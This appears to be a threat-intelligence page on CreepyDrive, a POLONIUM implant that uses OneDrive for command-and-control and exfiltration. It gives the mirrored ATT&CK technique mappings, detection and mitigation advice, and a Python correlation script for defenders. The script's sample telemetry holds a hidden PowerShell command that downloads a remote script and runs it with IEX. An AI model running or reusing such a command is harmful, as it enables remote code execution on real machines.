
S1023: CreepyDrive

CreepyDrive is a custom implant that has been used by POLONIUM since at least early 2022 for C2 with, and exfiltration to, actor-controlled OneDrive accounts.[1]

POLONIUM has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.[1]

Domain: Enterprise | ID: S1023 | Type: Malware | Object v1.0 | Modified
Glexia's Take

Analyst context for executives and security teams

Analyst confidence: Medium

CreepyDrive matters because it shows how an implant can blend command-and-control and data theft into normal-looking cloud activity, specifically actor-controlled OneDrive accounts, with a similar Dropbox-based implant noted by MITRE. For leaders, the key issue is not the malware name alone; it is whether the organization can distinguish legitimate Office Suite/cloud storage use from unauthorized C2, file discovery, token misuse, tool transfer, and exfiltration from Windows and Office Suite environments.

Executive priority

Prioritize validation of cloud storage governance, identity token controls, and SOC visibility for OneDrive/Office Suite activity. This behavior is material to business continuity and incident decision-making because exfiltration to common cloud services can bypass controls that only focus on unusual destinations. Risk owners should ask whether cloud access logs, endpoint PowerShell telemetry, file access evidence, and data movement records are retained well enough to support investigation, audit evidence, and rapid containment.

Technical view

MITRE does not provide object-specific detection text for CreepyDrive, so defenders should validate coverage through the related ATT&CK behaviors: PowerShell execution, file and directory discovery, data collection from local systems, web-protocol C2, bidirectional communication through web services, ingress tool transfer, application access token use, and exfiltration to cloud storage. SOC and IR teams should focus on Windows endpoint activity and Office Suite/cloud telemetry involving OneDrive, while considering the related note that a similar implant, CreepyBox, used actor-controlled Dropbox accounts.

Likely telemetry

  • Windows process creation and command-line telemetry, especially PowerShell activity
  • PowerShell script block, module, and operational logs where enabled
  • Endpoint file system access, file enumeration, and staging indicators
  • Network proxy, DNS, TLS, and web gateway logs for cloud storage and web protocol traffic
  • Office Suite and OneDrive audit logs, including file upload/download and sharing activity

Detection direction

  • Baseline legitimate OneDrive and Office Suite usage before alerting on volume alone; business processes can generate high cloud storage traffic.
  • Correlate PowerShell execution with file discovery, local data access, cloud storage communication, and unusual upload behavior rather than relying on a single indicator.
  • Review for suspicious application access token activity, including unexpected token use against Office Suite resources, because ATT&CK links the object to application access token abuse.
  • Tune detections for web-service-based bidirectional communication where endpoints repeatedly poll or exchange data with cloud services in patterns inconsistent with normal user behavior.
  • Include Dropbox-related monitoring where permitted, because MITRE notes a similar implant called CreepyBox relied on actor-controlled Dropbox accounts.
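The correlation the bullets above describe, as an added example that is not part of the original page or of any MITRE or Glexia tooling: PowerShell processes invoking the cmdlets named in the ATT&CK procedure text (or their aliases) are joined with per-host upload volume to Microsoft Graph/OneDrive, and a host is flagged only when both conditions hold and its uploads exceed a fleet-wide median baseline. Host names, command lines, proxy records and the destination list are constructed assumptions.

```python
import re
import statistics
from collections import defaultdict

# Constructed sample telemetry (hypothetical; not from the page or any real incident).
PROCESS_EVENTS = [
    {"host": "WS-01", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX (Invoke-WebRequest -Uri https://graph.microsoft.com/v1.0/me/drive/root:/t.ps1:/content)\""},
    {"host": "WS-02", "image": "powershell.exe", "cmdline": "powershell -File C:\\Scripts\\backup.ps1"},
    {"host": "WS-03", "image": "excel.exe", "cmdline": "excel.exe /e"},
]
PROXY_EVENTS = [  # (host, destination, HTTP method, bytes sent)
    ("WS-01", "graph.microsoft.com", "PUT", 9_500_000),
    ("WS-01", "graph.microsoft.com", "GET", 1_200),
    ("WS-02", "graph.microsoft.com", "PUT", 300_000),
    ("WS-03", "graph.microsoft.com", "PUT", 250_000),
    ("WS-04", "graph.microsoft.com", "PUT", 280_000),
]
# Assumed cloud-storage destinations to watch; extend per environment (e.g. Dropbox, see CreepyBox note).
CLOUD_STORAGE = ("graph.microsoft.com", "sharepoint.com", "1drv.ms")
# Cmdlets named in the ATT&CK procedure text plus their built-in PowerShell aliases.
PS_PATTERN = re.compile(r"\b(Invoke-WebRequest|iwr|Invoke-Expression|iex)\b", re.IGNORECASE)

def suspicious_powershell(event):
    """True when a PowerShell process used a web-request or expression-evaluation cmdlet."""
    return event["image"].lower() == "powershell.exe" and PS_PATTERN.search(event["cmdline"]) is not None

def upload_bytes_by_host(proxy_events):
    """Sum bytes sent in PUT/POST requests to cloud-storage destinations, per host."""
    totals = defaultdict(int)
    for host, dest, method, sent in proxy_events:
        if method in ("PUT", "POST") and dest.endswith(CLOUD_STORAGE):
            totals[host] += sent
    return totals

def flag_hosts(process_events, proxy_events, ratio=5.0):
    """Hosts with suspicious PowerShell AND cloud uploads far above the fleet baseline.
    Baseline = median per-host upload volume, so a single noisy host does not set the bar."""
    uploads = upload_bytes_by_host(proxy_events)
    baseline = statistics.median(uploads.values()) if uploads else 0
    ps_hosts = {e["host"] for e in process_events if suspicious_powershell(e)}
    return {h: b for h, b in uploads.items() if h in ps_hosts and b > ratio * baseline}

if __name__ == "__main__":
    print(flag_hosts(PROCESS_EVENTS, PROXY_EVENTS))  # {'WS-01': 9500000}
```

WS-02 uploads a modest amount and never calls the cmdlets, so it stays unflagged even though it runs PowerShell; only the host that satisfies both signals is returned.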

Mitigation priorities

  • Ensure Office Suite and cloud storage audit logging is enabled and retained for investigations.
  • Harden identity controls around application access tokens, including review of token grants, service principals, consent workflows, and anomalous SaaS access.
  • Restrict or govern cloud storage use based on business need, with monitoring for uploads to unapproved or unusual accounts where feasible.
  • Improve endpoint controls for PowerShell visibility and policy enforcement on Windows systems.
  • Use data protection controls to identify and alert on sensitive data movement to cloud storage services.

Analyst notes and limits

The supplied ATT&CK object identifies CreepyDrive as a custom implant used by POLONIUM since at least early 2022 for C2 with, and exfiltration to, actor-controlled OneDrive accounts. Relationship context links the malware to collection, discovery, execution, C2, token abuse, tool transfer, and cloud exfiltration techniques. The group relationship notes POLONIUM's reported targeting history, but this take does not infer current targeting or exposure for any specific organization.

MITRE provides no official detection guidance for this malware object, no explicit tactics on the object itself, and no aliases or labels. Coverage decisions require local evidence from endpoint, identity, Office Suite, SaaS, and network telemetry. Platform statements are limited to the supplied Windows and Office Suite fields plus related technique context.

Official MITRE ATT&CK definition

CreepyDrive

CreepyDrive is a custom implant that has been used by POLONIUM since at least early 2022 for C2 with, and exfiltration to, actor-controlled OneDrive accounts.[1]

POLONIUM has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.[1]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library).

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

Domain | ID | Name | Relationship / procedure
Enterprise | T1071.001 | Web Protocols (sub-technique) | CreepyDrive can use HTTPS for C2 using the Microsoft Graph API.[1]
Enterprise | T1567.002 | Exfiltration to Cloud Storage (sub-technique) | CreepyDrive can use cloud services including OneDrive for data exfiltration.[1]
Enterprise | T1102.002 | Bidirectional Communication (sub-technique) | CreepyDrive can use OneDrive for C2.[1]
Enterprise | T1550.001 | Application Access Token (sub-technique) | CreepyDrive can use legitimate OAuth refresh tokens to authenticate with OneDrive.[1]
Enterprise | T1083 | File and Directory Discovery | CreepyDrive can specify the local file path to upload files from.[1]
Enterprise | T1105 | Ingress Tool Transfer | CreepyDrive can download files to the compromised host.[1]
Enterprise | T1059.001 | PowerShell (sub-technique) | CreepyDrive can use PowerShell for execution, including the cmdlets `Invoke-WebRequest` and `Invoke-Expression`.[1]
Enterprise | T1005 | Data from Local System | CreepyDrive can upload files to C2 from victim machines.[1]

Associated objects

Groups, software, and campaigns

Group (Enterprise domain)

G1005: POLONIUM

POLONIUM is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess POLONIUM has coordinated their operations with multiple actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling.[1]


Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the ATT&CK resources Updates page.

ATT&CK release: 19.1
Object version: 1.0
Created: (not shown in snapshot)
Modified: (not shown in snapshot)
Raw hash: 3524d0c407d6a9c5...

Imported snapshots across ATT&CK releases (1):
Release | Bundle imported | Object version | Modified | Status | Raw hash
19.1 | (not shown) | 1.0 | (not shown) | Current bundle | 3524d0c407d6…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1] Microsoft POLONIUM June 2022. Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022.
  2. [2] mitre-attack S1023. MITRE ATT&CK software entry S1023 (CreepyDrive).
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.